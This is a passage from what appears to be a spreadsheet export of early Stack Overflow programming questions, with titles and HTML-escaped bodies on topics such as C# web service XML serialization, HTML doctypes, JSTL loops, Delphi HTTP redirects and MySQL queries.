&lt;pre&gt;&lt;code&gt;[WebMethod]
    public List&amp;lt;StorageObject&amp;gt; GetStorageObjects() {
      List&amp;lt;StorageObject&amp;gt; o = new List&amp;lt;StorageObject&amp;gt;() {
        new StorageObject() { 
          Name = "Matthew",
          Birthday = "Jan 1st, 2008", 
          OtherInfo = new List&amp;lt;NameValuePairs&amp;gt;() {
            new NameValuePairs() { Name = "Hobbies", Value = "Programming" },
            new NameValuePairs() { Name = "Website", Value = "Stackoverflow.com" }
          }
        },
        new StorageObject() { 
          Name = "Joe",
          Birthday = "Jan 10th, 2008",
          OtherInfo = new List&amp;lt;NameValuePairs&amp;gt;() { 
            new NameValuePairs() { Name = "Hobbies", Value = "Programming" },
            new NameValuePairs() { Name = "Website", Value = "Stackoverflow.com" }
          }
        }
      };
      return o;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Return Value from Web Service:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;StorageObject&amp;gt;
    &amp;lt;Name&amp;gt;Matthew&amp;lt;/Name&amp;gt;
    &amp;lt;Birthday&amp;gt;Jan 1st, 2008&amp;lt;/Birthday&amp;gt;
    &amp;lt;OtherInfo&amp;gt;
    	&amp;lt;NameValuePairs&amp;gt;
    		&amp;lt;Name&amp;gt;Hobbies&amp;lt;/Name&amp;gt;
    		&amp;lt;Value&amp;gt;Programming&amp;lt;/Value&amp;gt;
    	&amp;lt;/NameValuePairs&amp;gt;
    	&amp;lt;NameValuePairs&amp;gt;
    		&amp;lt;Name&amp;gt;Website&amp;lt;/Name&amp;gt;
    		&amp;lt;Value&amp;gt;Stackoverflow.com&amp;lt;/Value&amp;gt;
    	&amp;lt;/NameValuePairs&amp;gt;
    &amp;lt;/OtherInfo&amp;gt;
&amp;lt;/StorageObject&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;What I want:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;OtherInfo&amp;gt;
    &amp;lt;Hobbies&amp;gt;Programming&amp;lt;/Hobbies&amp;gt;
    &amp;lt;Website&amp;gt;Stackoverflow.com&amp;lt;/Website&amp;gt;
&amp;lt;/OtherInfo&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;The Reason &amp;amp; Other Stuff:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;First, I'm sorry for the length of the post, but I wanted to give reproducible code as well.  &lt;/p&gt;
&lt;p&gt;I want it in this format, because I'm consuming the web services from PHP.  I want to easily go:&lt;/p&gt;
&lt;p&gt;//  THIS IS IMPORANT&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;In PHP =&amp;gt; "$Result["StorageObject"]["OtherInfo"]["Hobbies"]".
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If it's in the other format, then there would be no way for me to accomplish that, at all.  Additionally, in C# if I am consuming the service, I would also like to be able to do the following:&lt;/p&gt;
&lt;p&gt;//  THIS IS IMPORANT&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;In C# =&amp;gt; var m = ServiceResult[0].OtherInfo["Hobbies"];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Unfortunately, I'm not sure how to accomplish this.  I was able to get it this way, by building a custom Dictionary that implemented IXmlSerializer (see &lt;a href="http://stackoverflow.com/questions/67959/c-xml-serialization-gotchas"&gt;StackOverflow:  IXmlSerializer Dictionary&lt;/a&gt;), however, it blew the WSDL schema out of the water.  It's also much too complicated, and produced horrible results in my WinFormsTester application!&lt;/p&gt;
&lt;p&gt;Is there any way to accomplish this ?  What type of objects do I need to create ?  Is there any way to do this /other than by making a strongly typed collection/ ?  Obviously, if I make it strongly typed like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class OtherInfo {
  public string Hobbies { get; set; }
  public string FavoriteWebsite { get; set; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then it would work perfectly, I would have no WSDL issues, I would be able to easily access it from PHP, and C# (.OtherInfo.Hobbies). &lt;/p&gt;
&lt;p&gt;However, I would completely lose the point of NVP's, in that I would have to know in advance what the list is, and it would be un</t>
  </si>
  <si>
    <t>What are the different doctypes in html and what do they mean?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As the title describes, what are the different doctypes available and what do they mean? I notice that the layout looks a little different in IE7 when I switch from &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" &amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Are there any others and what are the effects or ramifications?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Configuring SQL Server 2005 with both server replication and client replication</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to set up this scenario: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;A SQL Server 2005 database will create a transactional replication subscription from another database to populate a set of lookup tables. These lookup tables will then be published as a merge replication publication to the client's SQL Server Mobile.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I remember seeing a similar scenario defined in the SQL Server Books Online somewhere, but I was unable to find the link anymore. I hope someone can help me find it, or otherwise point me to any other similar links.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to implement Google Suggest in your own web application (e.g. using Python)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my website, users have the possibility to store links.&lt;/p&gt;
&lt;p&gt;During typing the internet address into the designated field I would like to display a suggest/autocomplete box similar to Google Suggest or the Chrome Omnibar.&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;p&gt;User is typing as URL:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://www.sta
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Suggestions which would be displayed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://www.staples.com
http://www.starbucks.com
http://www.stackoverflow.com
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I achieve this while not reinventing the wheel? :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Data structure used for directory structure?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm making a program which the user build directories (not in windows, in my app) and in these folders there are subfolders and so on; every folder must contain either folders or documents. What is the best data structure to use? Notice that the user may select a subfolder and search for documents in it and in its subfolders. And I don't want to limit the folders or the subfolders levels.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript Drag and drop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for someone to explain how to drag and drop in javascript, I want a horizontal line with some customizable images in it.&lt;/p&gt;
&lt;p&gt;I've had a look at the online tutorials for these but find them very hard to use.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where can I find a good documentation about the core concept of REST?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I found a good description on &lt;a href="http://en.wikipedia.org/wiki/Representational_State_Transfer" rel="nofollow"&gt;wikipedia&lt;/a&gt; with a few reference links, but there may be better ones, please help me to find these!&lt;/p&gt;
&lt;p&gt;To be clear, I am not looking for implementation for any language specific implementation guides, just the pure concept.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Register allocation rules in code generated by major C/C++ compilers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I remember some rules from a time ago (pre-32bit Intel processors), when was quite frequent (at least for me) having to analyze the assembly output generated by C/C++ compilers (in my case, Borland/Turbo at that time) to find performance bottlenecks, and to safely mix assembly routines with C/C++ code. Things like using the SI register for the &lt;em&gt;this&lt;/em&gt; pointer, AX being used for return values, which registers should be preserved when an assembly routine returns, etc.&lt;/p&gt;
&lt;p&gt;Now I was wondering if there's some reference for the more popular C/C++ compilers (Visual C++, GCC, Intel...) and processors (Intel, ARM, ...), and if not, where to find the pieces to create one. Ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tunneling proxy on VS 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to tunnel a proxy to access a remote sql server database on visual studio 2008?
I'm working in a project at college that uses a sql server database but the access is restricted to the internal network. I'd like to access the database from my home too.
Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fatal CLR Error 80004005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Today, everytime I try to open any &lt;strong&gt;.Net application&lt;/strong&gt; I get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CLR error: 80004005
The program will now terminate.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an easy way to plot Polyline Area, i.e. service coverage area, and also check to see if visitor's address lies within that area using Google Maps API and PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am the owner of a business that is building a new website application. My partner is the programmer who is doing the development and neither one of us has any real in-depth experience with Google Map API or it's polyline/polygon area capabilities.&lt;/p&gt;
&lt;p&gt;We need an easy way to capture inputs within our user admin area where our locations can enter their service coverage area info i.e. 1st street north of Jones blvd, or a 5 mile radius from the location address, etc. and have the Google Map API plot the polyline borders.&lt;/p&gt;
&lt;p&gt;Then, visitors to our site need to be able to see this info when they view the google map for one of our locations and also see if their service address falls within that service area or not. We then need to set a flag somehow to trigger a notification to the visitor that their address is not eligible for service or delivery.&lt;/p&gt;
&lt;p&gt;If anyone can assist us with this (example php code to interface with the suggested APIs would be preferred and ideal as we simply don't understand the complexities of the Google API, the polyline coordinate capture tool, etc), it would be greatly appreciated, as we have struggled to figure out how to create this in php and more importantly how to integrate it into our existing site.&lt;/p&gt;
&lt;p&gt;Thank you in advance for your replies and assistance.&lt;/p&gt;
&lt;p&gt;Sincerely, &lt;/p&gt;
&lt;p&gt;Larry D
Managing Director
SunMark Ventures&lt;/p&gt;
&lt;p&gt;Update: Thank you for your answer CodeMeIT...how do recommend we capture these longlats in our sql database...i.e. what is the field format or type and do we need to have separate fields for long and lat, and how can we standardize for all locations, i.e. how many long and lats are needed to create a polygon area, as we want to be able to have our location managers input this info for their own locations from their user login areas...&lt;/p&gt;
&lt;p&gt;Thank you in advance for your assistance...greatly appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NSString indexOf in Objective-C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there anything similar to an &lt;code&gt;indexOf&lt;/code&gt; function in the NSString objects?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where to get more information on Dictionary ADT and Skip List for Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to go deep into Dictionary ADT and Skip List for Java. My textbook doesn't cover a lot about this and whatever it has covered is very complicated. Which is the best online site to get more information on Dictionary ADT and Skip List for Java. I'm looking for the one which talks visually and gives a lot of examples.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get rid of stupid "pad" labels produced by RTML functions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am unlucky to be in charge of maintaining some old Yahoo! Store built using their RTML-based platform.&lt;/p&gt;
&lt;p&gt;Recently I've noticed that HTML code generated by some RTML functions is sprinkled all over with "padding images" (or whatever is the conventional name for those 1x1 pixel images used to enforce layout). I have nothing against using such images, but... all those images are supplied with an ALT attribute like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;img href="http://.../image1x1.gif" alt="pad"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With all due respect to the original authors of RTML, but they must have been smoking something when they came up with this "accessibility enhancement"... :-(&lt;/p&gt;
&lt;p&gt;Anyway, here are my questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Does anybody know a list of all RTML functions that generate HTML with all these "pad" images?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Is there any way to get rid of all those &lt;strong&gt;alt="pad"&lt;/strong&gt; attributes without rewriting a lot of RTML code?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;NB:&lt;/strong&gt; This may sound a little cynical, but improved accessibility is not the main goal here. The main goal is to stop exposing those moronic &lt;strong&gt;alt="pad"&lt;/strong&gt; attributes to Google and other smart search engines. So client-side scripting is not going to help, as far as I know.&lt;/p&gt;
&lt;p&gt;Thank you!&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;P.S. Probably, most of you are really lucky and never heard of RTML. Because if somebody would establish a prize for software products based on&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;commercial success
------------------
    usability
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;ratio, this RTML-based "platform" would probably win the first place.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;P.P.S. Apparently someone from Yahoo! finally listened, because I can no longer find those silly "pad" tags in the RTML generated for our store. Nevertheless, one of the ideas offered in response to my original question does provide a very practical solution - not just to the original problem but to any similar problem with RTML platform. See the winning answer - it's really good.&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a View in Oracle?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is a view in Oracle?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JSTL forEach tag: problems with enumeration, and with understanding how it should work</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;br /&gt;
I've experienced rather strange behavior of JSTL forEach tag.&lt;/p&gt;
&lt;p&gt;I have some bean called SessionBean:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class SessionBean {
  private Collection&amp;lt;MyObject&amp;gt; objects;
  public Collection&amp;lt;MyObject&amp;gt; getObjects() {return objects;}
  ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And a simple JSP page like that:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%@page contentType="text/html"%&amp;gt;
&amp;lt;%@page pageEncoding="UTF-8"%&amp;gt;
&amp;lt;%@taglib prefix="f" uri="http://java.sun.com/jsf/core"%&amp;gt;
&amp;lt;%@taglib prefix="h" uri="http://java.sun.com/jsf/html"%&amp;gt;
&amp;lt;%@taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %&amp;gt;
&amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;f:view&amp;gt;
        &amp;lt;h:form&amp;gt;
            &amp;lt;c:forEach var="myObject" items="#{SessionBean.objects}"&amp;gt;
                &amp;lt;h:outputText value="#{myObject}" /&amp;gt; &amp;lt;br /&amp;gt;
            &amp;lt;/c:forEach&amp;gt;
        &amp;lt;/h:form&amp;gt;
    &amp;lt;/f:view&amp;gt;
&amp;lt;/body&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And, it doesn't work. Exeption thrown is&lt;/p&gt;
&lt;pre&gt;
javax.servlet.jsp.JspTagException: Don't know how to iterate over supplied "items" in &amp;lt;forEach&amp;gt;
        at org.apache.taglibs.standard.tag.common.core.ForEachSupport.toForEachIterator(ForEachSupport.java:255)
        at org.apache.taglibs.standard.tag.common.core.ForEachSupport.supportedTypeForEachIterator(ForEachSupport.java:219)
   ....
&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;Why?&lt;/em&gt;&lt;br /&gt;
And then I change &lt;code&gt;items="#{SessionBean.objects}"&lt;/code&gt; to items=&lt;code&gt;"${SessionBean.objects}"&lt;/code&gt;, and there's no exception. Except for MyObjects aren't printed.&lt;/p&gt;
&lt;p&gt;Then, I make the same change to &lt;code&gt;&amp;lt;h:outputText value="#{myObject}" /&amp;gt;&lt;/code&gt;, and it's invalid value for this attribute.&lt;/p&gt;
&lt;p&gt;Finally, replacing JSF &lt;code&gt;outputText&lt;/code&gt; tag with just &lt;code&gt;${myObject}&lt;/code&gt; works as expected.&lt;/p&gt;
&lt;p&gt;Could somebody explain, what happens here on each phase, please?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;U:&lt;/strong&gt; SessionBean is managed by JSF, and surely was created, for it performs some actions in the header.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;RESOLUTION:&lt;/strong&gt; The problem proved to be due to incompatibility between JSTL and JSF in J2EE 1.4. Switching to J2EE 5 made the first variant work just fine.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create an nullary Functor in C++ (using the loki library)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Writing something like this using the &lt;a href="http://loki-lib.sourceforge.net/" rel="nofollow"&gt;loki library&lt;/a&gt;,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typedef Functor&amp;lt;void&amp;gt; BitButtonPushHandler;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;throws a compiler error, but this works&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typedef Functor&amp;lt;void,TYPELIST_1(Matrix3D*)&amp;gt; Perspective;
&lt;/code&gt;&lt;/pre&gt;
&lt;blockquote&gt;
  &lt;p&gt;Functor.h:530: error: '((Loki::FunctorHandler, int&gt;&lt;em&gt;)this)-&gt;Loki::FunctorHandler, int&gt;::f&lt;/em&gt;' cannot be used as a function
  Functor.h:530: error: return-statement with a value, in function returning 'void'&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Anyone familiar with this library know how to get the first line working?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a good design for an extensible query interface?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our application exposes queries by way of web services, and what we've found is that our clients often want custom queries, either by way of further limiting the results returned by specifying additional criteria, or by asking for things that we don't already expose.&lt;/p&gt;
&lt;p&gt;Now, we can take the approach of creating new methods for each of these new methods, but that's somewhat inconvenient; deployment of our application at a client site usually requires weeks of staged integration testing.  We've proposed a named query mechanism, where the application administrator would define queries by name that are parameterized, and a corresponding web service that simply invokes these parameters.  However, I can't help but think that someone has solved this problem before, so I'd like some input from the SO community on possible designs.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Updates&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The specification pattern is a good one, but our application deals with enough data that we want to push as much of the querying work down into an RDBMS, which can do a better job of optimizing the query plan than we would ever want to.  Moreover, we support three RDBMS backends, so we're stuck using a greatest-common-denominator approach:  we use as much capability as the least functional database can provide.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get a particular word from a string in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say you have a string, but you don't know what it contains. And you want to replace all occurences of a particular word or part of a word with a formatted version of the same word.
For example, I have a string that contains "lorem ipsum" and i want to replace the entire word that contains "lo" with "lorem can" so that the end result would be "lorem can ipsum"
but if I put the string "loreal ipsum" through the same function, the result would now be "loreal can ipsum".
Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get the TNMHTTP Get method to respond on a redirect</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using TNMHTTP in Delphi to retrieve the code from a webpage. The code is relatively simple:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NMHTTP1 := TNMHTTP.Create(Self);
NMHTTP1.InputFileMode := FALSE;
NMHTTP1.OutputFileMode := FALSE;
NMHTTP1.ReportLevel := Status_Basic;
NMHTTP1.TimeOut := 3000;
URL := 'http://www....';
NMHTTP1.Get(URL); 
S := NMHTTP1.Body;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am catching exceptions in a try/except block, but that is not the problem.&lt;/p&gt;
&lt;p&gt;The problem is that on executing the NMHTTP1.Get method when the URL is a redirect, that method does not return and the program hangs. This is despite the fact that I've put a timeout of 3000 seconds in.&lt;/p&gt;
&lt;p&gt;So I see three possible ways of solving this (in order of easiest to hardest for me to modify my program):  &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Do whatever is necessary to get the NMHTTP1.Get method to respond.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Do some sort of check in advance of the NMHTTP1.Get statement to see if the URL is a redirect and get the URL it is redirecting to.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Use another method to get a webpage using Delphi. When I wrote this, I used Delphi 4 and did not have Indy. I now have Delphi 2009, so I would be willing to use something that works in it (maybe INDY) if a simple #1 or #2 answer is not available.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I would love to get an answer from someone that will work for me. Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Change journal operations in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for the .NET/C# way of performing &lt;a href="http://msdn.microsoft.com/en-us/library/aa363801%28VS.85%29.aspx"&gt;Change Journal Operations&lt;/a&gt; (without importing unmanaged code).&lt;/p&gt;
&lt;p&gt;Any hints or RTFM-links?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL: get differences of each sorted column in set of rows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here is a simple scenario with table characters:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CharacterName GameTime Gold Live
Foo 10 100 3 
Foo 20 100 2 
Foo 30 95 2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I get this output for the query &lt;code&gt;SELECT Gold, Live FROM characters WHERE name = 'Foo' ORDER BY GameTime&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Gold Live
100 3
0 -1
-5 0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;using MySQL stored procedure (or query) if it's even possible? I thought of using 2 arrays like how one would normally do in a server-side language, but MySQL doesn't have array types.&lt;/p&gt;
&lt;p&gt;While I'm aware it's probably easier to do in PHP (my server-side langauge), I want to know if it's possible to do in MySQL, just as a learning material.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does adding a project reference break my build?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;solution structure [Plain Winforms + VS 2008 Express Edition]&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;CoffeeMakerInterface (NS CoffeeMaker)&lt;/li&gt;
&lt;li&gt;CoffeeMakerSoftware (NS CoffeeMakerSoftware)&lt;/li&gt;
&lt;li&gt;TestCoffeeMaker (NS TestCoffeeMaker)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;CoffeeMakerSoftware proj references CoffeeMakerInterface.
TestCoffeeMaker proj references CoffeeMakerInterface and CoffeeMakerSoftware.&lt;/p&gt;
&lt;p&gt;Now the thing that is driving me nuts. I can't get this to build. &lt;strong&gt;If I remove CoffeeMakerSoftware project reference from TestCoffeeMaker it builds (??!!).. as soon as I add the second project reference, it throws build errors&lt;/strong&gt; claiming that types declared in first reference 'can't be found.. are you missing an assembly ref'&lt;/p&gt;
&lt;p&gt;At first I had the first 2 assemblies having the same namespace CoffeeMaker.. I then made them distinct (although I think having classes belonging to the same NS across assemblies should be possible) but even that doesn't seem to be it.&lt;/p&gt;
&lt;p&gt;Calling more eyeballs. Any pointers..  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the simplest jQuery way to have a 'position:fixed' (always at top) div?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm relatively new to jQuery, but so far what I've seen I like. What I want is for a div (or any element) to be across the top of the page as if "position: fixed" worked in every browser.&lt;/p&gt;
&lt;p&gt;I do not want something complicated. I do not want giant CSS hacks. I would prefer if just using jQuery (version 1.2.6) is good enough, but if I need jQuery-UI-core, then that's fine too.&lt;/p&gt;
&lt;p&gt;I've tried $("#topBar").scrollFollow(); &amp;lt;-- but that goes slow... I want something to appear really fixed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>form layout with CSS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to create a form with, half linear view (textboxes and dropdownlists in separate line) and the other half, non linear view i.e. the textboxes will appear next to each other, like first name and last name will be next to each other. &lt;/p&gt;
&lt;p&gt;I am aware how to acomplish the linear view with CSS. I am using&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;fieldset {
  clear: both;
  font-size: 100%;
  border-color: #000000;
  border-width: 1px 0 0 0;
  border-style: solid none none none;
  padding: 10px;
  margin: 0 0 0 0;
}
label 
{
    float: left;
    width: 10em;
    text-align:right;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I get the non-linear view?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NSData and UIImage</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to load &lt;code&gt;UIImage&lt;/code&gt; object from &lt;code&gt;NSData&lt;/code&gt;, and the sample code was to &lt;code&gt;NSImage&lt;/code&gt;, I guess they should be the same. But just now loading the image, I am wondering what's the best to troubleshoot the &lt;code&gt;UIImage&lt;/code&gt; loading &lt;code&gt;NSData&lt;/code&gt; issue.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>php/Ajax - Best practice for pre-loading images</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have put together a script which is very much like the flickr photostream feature. Two thumbnails next to each other, and when you click the next or prev links the next (or previous) two images slide in. Cool!&lt;/p&gt;
&lt;p&gt;Currently when the page loads it loads the two images. The first time nxt / prv is used then the next two images or previous two are loaded via ajax, with the id of the first image being passed in the url and the HTML for the two new images returned and displayed via ajax.&lt;/p&gt;
&lt;p&gt;simple enough, but it got me to thinking, on a slow connection, or heavy server load then the two images, although relatively small thumbnails could still take a while to load, and the nice things with sliding panes is the fact that the hidden data slides in quickly and smoothly preferbly without a loading delay.&lt;/p&gt;
&lt;p&gt;So I was wondering from a performance and good practice point of view which option is best, this is what I can think of for now, open to suggestions.&lt;/p&gt;
&lt;p&gt;1, call each set of images via JSON (its supposed to be fast?) &lt;/p&gt;
&lt;p&gt;2,load all the possible images into a json file and pull in the details that way - although browser will still have to load image. Plus sometimes there might be 4 images, other times there could be upto 1000!&lt;/p&gt;
&lt;p&gt;3, Load 10 images via php into a Json or other file, and load all 10 images into the browser hiding the 8 which are not on show, and always showing the middle two. Problem here is that each time someone clicks, the file has to reload the first and last images, which still takes up time, although i suppose the middle images will have all been cached via the browser by now though. But still there is a loading time.&lt;/p&gt;
&lt;p&gt;4, Is it possible to have a json image with all the image details (regardless of numbers) and use no 3 above to load 10 of those images, is it possible to use ajax to only read 10 lines and keep a pointer of the last one it read, so the json file can be loaded fast, short refresh and images either side are cached via the browser!!&lt;/p&gt;
&lt;p&gt;Hope thats clear, any suggestions on how you would handle this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SharePoint Visual Studio document upload Web Test fails with Connot close stream until all bytes are written</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created a Visual Studio 2008 sp1 test suite web test that uploads a document to a document library in SharePoint. The test is a lot like the one described &lt;a href="http://www.helloitsliam.com/Lists/Posts/Post.aspx?ID=139" rel="nofollow"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;All is fine until the test is converted to a coded web test. Then the upload post returns the response &lt;/p&gt;
&lt;p&gt;"Request failed: Connot close stream until all bytes are written"&lt;/p&gt;
&lt;p&gt;Any ideas on how to get it going?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python vs Groovy vs Ruby? (based on criteria listed in question)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Considering the criteria listed below, which of Python, Groovy or Ruby would you use?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Criteria (Importance out of 10, 10 being most important)&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Richness of API/libraries available (eg. maths, plotting, networking) (9)&lt;/li&gt;
&lt;li&gt;Ability to embed in desktop (java/c++) applications (8)&lt;/li&gt;
&lt;li&gt;Ease of deployment (8)&lt;/li&gt;
&lt;li&gt;Ability to interface with DLLs/Shared Libraries (7)&lt;/li&gt;
&lt;li&gt;Ability to generate GUIs (7)&lt;/li&gt;
&lt;li&gt;Community/User support (6)&lt;/li&gt;
&lt;li&gt;Portability (6)&lt;/li&gt;
&lt;li&gt;Database manipulation (3)&lt;/li&gt;
&lt;li&gt;Language/Semantics (2)&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How do you access an attached property of a Silverlight object in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Basically I'm trying to change the &lt;code&gt;Canvas.Left&lt;/code&gt; property of an Ellipse Silverlight control in C#.  Here is how I'm accessing the control:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Ellipse c1 = this.FindName("Circle1") as Ellipse;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How would I then set the &lt;code&gt;Canvas.Left&lt;/code&gt; property?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Jeff&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to perform arbitrary data analysis in Erlang?</t>
  </si>
  <si>
